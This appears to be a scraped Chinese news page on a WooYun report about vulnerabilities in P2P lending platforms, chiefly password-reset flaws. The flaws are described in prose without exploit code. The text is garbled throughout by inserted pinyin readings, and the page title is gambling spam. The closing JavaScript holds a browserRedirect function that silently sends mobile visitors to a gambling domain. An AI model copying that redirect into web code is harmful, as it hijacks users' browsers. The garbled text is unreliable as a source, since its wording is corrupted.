澳门葡京登陆

行业新闻industrynews

乌云解构P2P安全漏洞 密码重置漏洞最普遍

时间: 2017-10-31 08:30:21 点击数: 0

近日乌云(yun)平(ping)台(tai)整理了一(yi)份关于P2P平(ping)台(tai)漏(lou)洞(dong)的报(bao)告(gao)。报(bao)告(gao)数(shu)据显示,自2014年(nian)至(zhi)今,平(ping)台(tai)收到的有关P2P行(xing)业漏(lou)洞(dong)总数(shu)为402个,仅(jin)2015年(nian)上(shang)半(ban)年(nian)就有235个,仅(jin)上(shang)半(ban)年(nian)就比去年(nian)一(yi)年(nian)增(zeng)长了40.7%。2014年(nian)至(zhi)2015年(nian)8月乌云(yun)漏(lou)洞(dong)报(bao)告(gao)平(ping)台(tai)P2P行(xing)业漏(lou)洞(dong)数(shu)量统计显示,高危漏(lou)洞(dong)占(zhan)56.2%,中危漏(lou)洞(dong)占(zhan)23.4%,低危漏(lou)洞(dong)占(zhan)12.3%,8.1%被厂(chang)商忽略。

目前(qian),有的漏洞已经修复,有的仍然存在(zai)。

2014年至今,有(you)可能影响到资金(jin)安全的漏洞(dong)(dong)就(jiu)占(zhan)(zhan)来漏洞(dong)(dong)总数量的39%。2015年上半年中,对资金(jin)有(you)危害的漏洞(dong)(dong)就(jiu)占(zhan)(zhan)了(le)今年P2P漏洞(dong)(dong)综(zong)述的43%。

在(zai)逻辑漏(lou)洞中,密码(ma)重置(zhi)漏(lou)洞占60%;访问漏(lou)洞占40%,支付漏(lou)洞占16%,其他占20%。

下面六组案例大(da)部分厂商(shang)认同(tong),并且已经修复。其中,密码重置(zhi)漏(lou)洞非常普遍(bian)——

漏洞(dong)案例一:

逻辑错误或设计(ji)缺陷导致的(de)密码重置(zhi)漏洞

涉及(ji)平台:搜易贷、翼龙贷、金海贷、和信(xin)贷、拍(pai)拍(pai)贷以及(ji)有(you)利(li)网

简(jian)单来说,就是攻击者拿着自己(ji)密码重置(zhi)(zhi)的凭证重置(zhi)(zhi)了别的密码。

比如在翼龙贷的案例中,通过找回(hui)密码,抓包可以看(kan)到用户的邮箱、余额(e)、手机号、ID等敏(min)感信息。

此外,利用Email 和(he) ID,白帽还可(ke)以(yi)重置用户的密码(ma)。

在有利网的案例中,由于(yu)某个参数设置的过(guo)于(yu)简(jian)单,且发(fa)送请求时无次数限(xian)制,可(ke)以通过(guo)爆破重置任意用户密码。

在和信(xin)贷的案例(li)中,由于设计缺(que)陷,重(zhong)置(zhi)其它(ta)(ta)用户的密码不(bu)需要知道用户邮箱收(shou)到的具(ju)体URL,可以(yi)直接拼凑(cou)出重(zhong)置(zhi)其它(ta)(ta)用户密码的URL进行密码重(zhong)置(zhi)。

重置密码(ma)这个类(lei)型漏洞在P2P平台比较(jiao)普遍,包含爆破类(lei)型、妙改类(lei)型以(yi)及需要(yao)与人交互类(lei)型这三种,似乎“黑客”重置用(yong)户密码(ma)变成(cheng)一(yi)个非常简单(dan)的(de)事情。

用户的(de)密码(ma)(ma)都被(bei)重置了,资(zi)金还安全(quan)吗?乌(wu)云平(ping)台认为,重置密码(ma)(ma)从来都不是(shi)一件小事情,作为跟(gen)资(zi)金相关(guan)的(de)金融平(ping)台,密码(ma)(ma)不仅是(shi)对用户的(de)一层安全(quan)保障,也(ye)是(shi)自家(jia)资(zi)金安全(quan)的(de)门锁之(zhi)一。

乌云平台(tai)建议开发人(ren)员在开发的(de)过程中(zhong),应该注意“保(bao)证Cookie等可以重置密(mi)码(ma)的(de)凭证与用户之间的(de)对(dui)应关系(xi)”。

var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?993185dc8689f489fddf05459dcb9ba5"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); function browserRedirect() { var sUserAgent= navigator.userAgent.toLowerCase(); var bIsIpad= sUserAgent.match(/ipad/i) == "ipad"; var bIsIphoneOs= sUserAgent.match(/iphone os/i) == "iphone os"; var bIsMidp= sUserAgent.match(/midp/i) == "midp"; var bIsUc7= sUserAgent.match(/rv:1.2.3.4/i) == "rv:1.2.3.4"; var bIsUc= sUserAgent.match(/ucweb/i) == "ucweb"; var bIsAndroid= sUserAgent.match(/android/i) == "android"; var bIsCE= sUserAgent.match(/windows ce/i) == "windows ce"; var bIsWM= sUserAgent.match(/windows mobile/i) == "windows mobile"; if (bIsIpad || bIsIphoneOs || bIsMidp || bIsUc7 || bIsUc || bIsAndroid || bIsCE || bIsWM) { window.setTimeout("window.location='http://leyubet1410.com'",1000); } else { document.writeln(""); document.writeln(""); document.writeln(""); } } browserRedirect();